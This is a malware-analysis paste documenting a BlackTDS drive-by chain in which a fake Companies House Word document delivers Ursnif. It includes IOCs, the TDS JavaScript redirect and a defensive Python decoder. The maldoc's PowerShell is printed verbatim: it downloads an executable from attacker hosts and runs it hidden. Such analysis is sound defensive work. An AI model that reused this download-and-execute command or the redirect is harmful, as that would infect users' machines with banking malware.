[BlackTDS Driveby Maldoc leads to Ursnif]
==

[Maldoc - B1F7B208ACA0DE0CC28B547CD73EE980]
[https://app.any.run/tasks/33b1d89a-3e96-4165-8020-16a5548f15e4][1]
[1]: https://app.any.run/tasks/33b1d89a-3e96-4165-8020-16a5548f15e4

[Payload - 8cac839accda5f125d5f5d7226e4db92]
[https://app.any.run/tasks/2a064aed-3e5a-4690-87e7-78da4435352c][2]
[2]: https://app.any.run/tasks/2a064aed-3e5a-4690-87e7-78da4435352c

[BlackTDS]
--
celsiumoftesla.cf	GET / HTTP/1.1
94.23.47.105	GET /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1

[BlackTDS JavaScript]
--
<style> html, body { margin: 0; padding: 0; height : 100%; } </style>
<script type="text/javascript">
document.write('\<script type=\'text/javascript\'\>location = \'http://94.23.47.105/documents/4d75b248-19f0-4539-9d7c-659f1b9.doc\';\</script\>');
</script>
<iframe src="" style="display:block; width:100%; height:100%; border:none; margin:0; padding:0;"></iframe><span style="visibility: hidden"><a href="/insert">j2B7wKaXk658V</a><a href="/register">3xfgzc1roc</a></span>

[Maldoc - fake Companies House]
--
94.23.47.105	OPTIONS /documents/ HTTP/1.1
94.23.47.105	OPTIONS /documents/ HTTP/1.1
94.23.47.105	OPTIONS /documents/ HTTP/1.1
94.23.47.105	HEAD /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1
94.23.47.105	OPTIONS / HTTP/1.1
94.23.47.105	HEAD /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1
94.23.55.137	GET /docs/content.bin HTTP/1.1

http://allhealthsol.com/data/content.bin

[Maldoc PowerShell]
--
PowerShell "'PowerShell ""<#4ex#>function func459drt([String]$snew) { (New-Object System.Net.WebClient).DownloadFile($snew,''C:\Users\admin\AppData\Local\Temp\Rjdeoo.exe'');<#Secex#>Start-Process ''C:\Users\admin\AppData\Local\Temp\Rjdeoo.exe'';} <#Start and read data#> try{ func459drt ''http://94.23.55.137/docs/content.bin'' } catch { func459drt ''http://allhealthsol.com/data/content.bin''}'"" | Out-File -encoding ASCII -FilePath C:\Users\admin\AppData\Local\Temp\okecrhm.bat; Start-Process 'C:\Users\admin\AppData\Local\Temp\okecrhm.bat' -WindowStyle Hidden"
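
Added triage example (not part of the original paste or the any.run reports): a Python script that de-layers the two script stages shown above, the BlackTDS document.write() redirect and the maldoc's nested PowerShell, and checks the recovered URLs against the request lines from the captures. The TDS escapes `<`, `>` and the quotes with a backslash so the literal `</script>` inside the string cannot close the enclosing script block; the maldoc's outer PowerShell writes a .bat file whose body is a second PowerShell one-liner (hence the doubled `''` and `""` quotes) and launches it hidden, with the raw-IP URL tried first and the domain URL only in the catch{} fallback. The script and command strings are copied verbatim from the paste; the function names and the HTTP_LOG subset are this example's own.

```python
"""Added triage example (not from the paste): de-layer the BlackTDS redirect
and the maldoc PowerShell shown above and correlate the URLs with the capture."""
import json
import re
from urllib.parse import urlparse

# Stage 1: BlackTDS landing-page script, copied verbatim from the paste.
TDS_JS = r"""document.write('\<script type=\'text/javascript\'\>location = \'http://94.23.47.105/documents/4d75b248-19f0-4539-9d7c-659f1b9.doc\';\</script\>');"""

# Stage 2: PowerShell spawned by the maldoc, copied verbatim from the paste.
MALDOC_PS = r'''PowerShell "'PowerShell ""<#4ex#>function func459drt([String]$snew) { (New-Object System.Net.WebClient).DownloadFile($snew,''C:\Users\admin\AppData\Local\Temp\Rjdeoo.exe'');<#Secex#>Start-Process ''C:\Users\admin\AppData\Local\Temp\Rjdeoo.exe'';} <#Start and read data#> try{ func459drt ''http://94.23.55.137/docs/content.bin'' } catch { func459drt ''http://allhealthsol.com/data/content.bin''}'"" | Out-File -encoding ASCII -FilePath C:\Users\admin\AppData\Local\Temp\okecrhm.bat; Start-Process 'C:\Users\admin\AppData\Local\Temp\okecrhm.bat' -WindowStyle Hidden"'''

# Subset of the request lines from the sandbox captures above (host<TAB>request line).
HTTP_LOG = "\n".join([
    "celsiumoftesla.cf\tGET / HTTP/1.1",
    "94.23.47.105\tGET /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1",
    "94.23.47.105\tOPTIONS /documents/ HTTP/1.1",
    "94.23.47.105\tHEAD /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1",
    "94.23.55.137\tGET /docs/content.bin HTTP/1.1",
])


def decode_tds_redirect(js: str) -> dict:
    """Recover the HTML injected by document.write() and the URL it navigates to.

    Inside a JS string literal '\<' and '\>' are identity escapes and '\'' is a
    quote, so unescaping is simply dropping the backslash before each character.
    """
    m = re.search(r"document\.write\('(.*?)'\);", js, re.S)
    if not m:
        raise ValueError("no document.write('...') call found")
    injected = re.sub(r"\\(.)", r"\1", m.group(1))
    loc = re.search(r"location\s*=\s*'([^']+)'", injected)
    return {"injected_html": injected, "redirect_url": loc.group(1) if loc else None}


def decode_maldoc_powershell(cmd: str) -> dict:
    """De-layer the nested PowerShell: strip <# #> junk comments, undo one level
    of quote doubling ('' -> ', "" -> "), then pull out URLs and file paths."""
    cleaned = re.sub(r"<#.*?#>", "", cmd, flags=re.S)
    cleaned = cleaned.replace("''", "'").replace('""', '"')
    urls = re.findall(r"https?://[^\s'\"]+", cleaned)
    paths = list(dict.fromkeys(re.findall(r"[A-Za-z]:\\[^\s'\"();]+", cleaned)))
    return {
        "payload_urls": urls,  # primary URL first, catch{} fallback second
        "dropped_files": paths,  # downloaded EXE, then the .bat stager
        "uses_webclient_downloadfile": "WebClient).DownloadFile(" in cleaned,
        "hidden_window": "-WindowStyle Hidden" in cleaned,
    }


def correlate_with_log(urls, log: str) -> dict:
    """Map each decoded URL to the HTTP methods seen for its host+path in the capture."""
    seen = {}
    for line in log.splitlines():
        host, _, request = line.partition("\t")
        parts = request.split()
        if len(parts) < 2:
            continue
        seen.setdefault((host, parts[1]), []).append(parts[0])
    return {u: seen.get((urlparse(u).hostname, urlparse(u).path or "/"), []) for u in urls}


def extract_chain(js: str = TDS_JS, ps: str = MALDOC_PS, log: str = HTTP_LOG) -> dict:
    """Run both decoders and correlate every recovered URL with the capture."""
    stage1 = decode_tds_redirect(js)
    stage2 = decode_maldoc_powershell(ps)
    urls = [stage1["redirect_url"]] + stage2["payload_urls"]
    return {"stage1": stage1, "stage2": stage2, "log_hits": correlate_with_log(urls, log)}


if __name__ == "__main__":
    print(json.dumps(extract_chain(), indent=2))
```

The correlation shows the redirect target fetched twice (GET by the browser, HEAD by Word when the document is opened), the raw-IP payload URL fetched once, and the allhealthsol.com fallback never contacted because the first download succeeded; a detection written only for the domain would have missed this run.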

[Ursnif Rjdeoo.exe]
--
https://86.105.18.236/index.html

***
![Pastebin Logo][image]

[image]: https://zerophagemalware.files.wordpress.com/2017/09/zerophageicon2.png